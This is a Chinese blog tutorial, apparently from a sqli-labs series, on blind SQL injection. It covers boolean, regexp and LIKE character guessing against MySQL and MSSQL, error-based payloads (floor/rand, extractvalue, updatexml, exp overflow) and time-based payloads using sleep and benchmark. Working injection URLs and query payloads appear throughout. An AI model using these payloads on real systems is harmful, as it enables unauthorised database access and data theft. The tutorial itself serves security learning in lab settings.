sql注入盲注基础

最新推荐文章于 2024-04-11 10:15:00 发布

himobrinehacken

最新推荐文章于 2024-04-11 10:15:00 发布

阅读量258

点赞数 1

分类专栏： sqli-labs 文章标签：安全网络安全 sql 数据库 web安全 Powered by 金山文档

本文链接：https://blog.csdn.net/m0_73248913/article/details/128864266

版权

sqli-labs 专栏收录该内容

46 篇文章 0 订阅

订阅专栏

本文详细介绍了SQL盲注的概念，包括基于布尔的盲注，利用mid(),substr(),left()等函数进行字符截取，以及regexp正则表达式在盲注中的应用。还探讨了MSSQL的正则匹配和LIKE匹配注入方式，以及基于报错和时间延迟的盲注技巧，如利用BENCHMARK()和SLEEP()函数。

摘要由CSDN通过智能技术生成

文章会很长请大家耐心看完吧，因为盲注的知识点比较多，我只能说些我知道的东西但也有很多

盲注的定义

盲注其实就是我们执行sql注入的时候，选择的数据不会回显到前端（说白了前端看不到），但是也是服务器查询了，所以我们这里需要利用别的方式来进行判断或者尝试。

盲注的分类

这个只是大致的分类，有的大哥会有别的payload

基于布尔盲注——构造逻辑判断

截取字符的相关函数

mid（）函数

此函数截取字符串的一部分。

语法

mid(column_name,start[,length])

参数	是否必须填写	描述
column_name	必须	要提取字符的字段
start	必须	规定开始位置（起始值是 1）
length	可选	要返回的字符数。如果省略，则 MID() 函数返回剩余文本

一般利用：对名子的截取，利用自己的猜测来判断字符

substr（）函数

与上一个函数一样，截取字符串。

语法

string substring(string,start,length)
string substr(string,start,length)

参数描述与mid（）函数相同

left（）函数

left（）得到字符串左部指定个数的字符

语法

left(string,n)

string为要截取的字符串，n是长度

ord（）函数

返回字符的ASCII码的值（ascii（）函数一样的效果）

regexp正则注入

我们都已经知道，在MYSQL 5+中 information_schema库中存储了所有的库名，表明以及字段名信息。故攻击方式如下：

判断第一个表名的第一个字符是否是a-z中的字符,其中blind_sqli是假设已知的库名。

注：正则表达式中 ^[a-z] 表示字符串中开始字符是在 a-z范围内

index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-z]' LIMIT 0,1) /*

判断第一个字符是否是a-n中的字符

index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-n]' LIMIT 0,1)/*

确定该字符为n

index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^n' LIMIT 0,1) /*

表达式的更换如下

expression like this: '^n[a-z]' -> '^ne[a-z]' -> '^new[a-z]' -> '^news[a-z]' -> FALSE

这时说明表名为news ，要验证是否是该表明正则表达式为'^news$'，但是没这必要直接判断 table_name = ’news‘ 不就行了。

接下来猜解其它表了（只需要修改 limit 1,1 -> limit 2,1就可以对接下来的表进行盲注了）这里是错误的！！！

regexp匹配的时候会在所有的项都进行匹配。例如：

security数据库的表有多个，users，email等

select * from users where id=1 and 1=(select 1 from information_schema.tables where table_schema='security' and table_name regexp '^u[a-z]' limit 0,1);是正确的

select * from users where id=1 and 1=(select 1 from information_schema.tables where table_schema='security' and table_name regexp '^us[a-z]' limit 0,1);是正确的

select * from users where id=1 and 1=(select 1 from information_schema.tables where table_schema='security' and table_name regexp '^em[a-z]' limit 0,1);是正确的

select * from users where id=1 and 1=(select 1 from information_schema.tables where table_schema='security' and table_name regexp '^us[a-z]' limit 1,1);不正确

select * from users where id=1 and 1=(select 1 from information_schema.tables where table_schema='security' and table_name regexp '^em[a-z]' limit 1,1);不正确

实验表明：在limit 0,1下，regexp会匹配所有的项。我们在使用regexp时，要注意有可能有多个项，同时要一个个字符去爆破。类似于上述第一条和第二条。而此时limit 0,1此时是对于where table_schema='security' limit 0,1。table_schema='security'已经起到了限定作用了，limit有没有已经不重要了。

MSSQL所用的正则表达式并不是标准正则表达式，该表达式使用 like关键词

default.asp?id=1 AND 1=(SELECT TOP 1 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" and table_name LIKE '[a-z]%' )

该查询语句中，select top 1 是一个组合哦，不要看错了。

如果要查询其它的表名，由于不能像mysql哪样用limit x,1，只能使用

 table_name not in (select top x table_name from information_schema.tables)

意义是：表名没有在前x行里，其实查询的就是第x+1行。

例如查询第二行的表名：

default.asp?id=1 AND 1=(SELECT TOP 1 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" and table_name NOT IN ( SELECT TOP 1 table_name FROM information_schema.tables) and table_name LIKE '[a-z]%' )

表达式的顺序：

'n[a-z]%' -> 'ne[a-z]%' -> 'new[a-z]%' -> 'news[a-z]%' -> TRUE

之所以表达式 news[a-z]查询后返回正确是应为%代表0-n个字符，使用"_"则只能代表一个字符。故确认后续是否还有字符克用如下表达式

'news%' TRUE -> 'news_' FALSE

同理可以用相同的方法获取字段，值。这里就不再详细描述了。

like匹配注入

与上一个注入方法类似，mysql在匹配的时候使用like

select user() like 'ro%'

基于报错的sql盲注——构造payload让信息通过错误提示回显出来

Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))
a from information_schema.columns group by a;

//explain:此处有三个点，一是需要 concat 计数，二是 floor，取得 0 or 1，进行数据的重复，三是 group by 进行分组，但具体原理解释不是很通，大致原理为分组后数据计数时重复造成的错误。也有解释为 mysql 的 bug 的问题。但是此处需要将 rand(0)，rand()需要多试几次才行。

以上语句可以简化成如下的形式。

select count(*) from information_schema.tables group by concat(version(),
floor(rand(0)*2))

如果关键的表被禁用了，可以使用这种形式

select count(*) from (select 1 union select null union
select !1) group by concat(version(),floor(rand(0)*2))

如果 rand 被禁用了可以使用用户变量来报错

select min(@a:=1) from information_schema.tables group by concat(passwo
rd,@a:=(@a+1)%2)

select exp(~(select * FROM(SELECT USER())a))

double 数值类型超出范围

Exp()为以 e 为底的对数函数；版本在 5.5.5 及其以上可以参考 exp

报错文章：http://www.cnblogs.com/lcamry/articles/5509124.html

select !(select * from (select user())x) -（ps:这是减号） ~0

bigint 超出范围；~0 是对 0 逐位取反，很大的版本在 5.5.5 及其以上

可以参考文章 bigint 溢出文章 http://www.cnblogs.com/lcamry/articles/5509112.html

extractvalue(1,concat(0x7e,(select @@version),0x7e)) se

mysql 对 xml 数据进行查询和修改的 xpath 函数，xpath 语法错误

updatexml(1,concat(0x7e,(select @@version),0x7e),1)

mysql 对 xml 数据进行查询和修改的 xpath 函数，xpath 语法错误

select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x;

mysql 重复特性，此处重复了 version，所以报错。

基于时间的sql盲注——延时注入

If(ascii(substr(database(),1,1))>115,0,sleep(5))%23

if 判断语句，条件为假，执行 sleep

注：遇到以下这种利用 sleep()延时注入语句

select sleep(find_in_set(mid(@@version, 1, 1), '0,1,2,3,4,5,6,7,8,9,.'));

该语句意思是在 0-9 之间找版本号的第一位。但是在我们实际渗透过程中，这种用法是不可取的，因为时间会有网速等其他因素的影响，所以会影响结果的判断。

union select if(substring(current,1,1)=char(119),benchmak(5000000,encode(‘MSG’,’by 5 seconds’)),null) from (select database() as current) as tb1;//BENCHMARK(count,expr)用于测试函数的性能，参数一为次数，二为要执行的表达式。可以让函数执行若干次，返回结果比平时要长，通过时间长短的变化，判断语句是否执行成功。这是一种边信道攻击，在运行过程中占用大量的 cpu 资源。推荐使用 sleep()函数进行注入。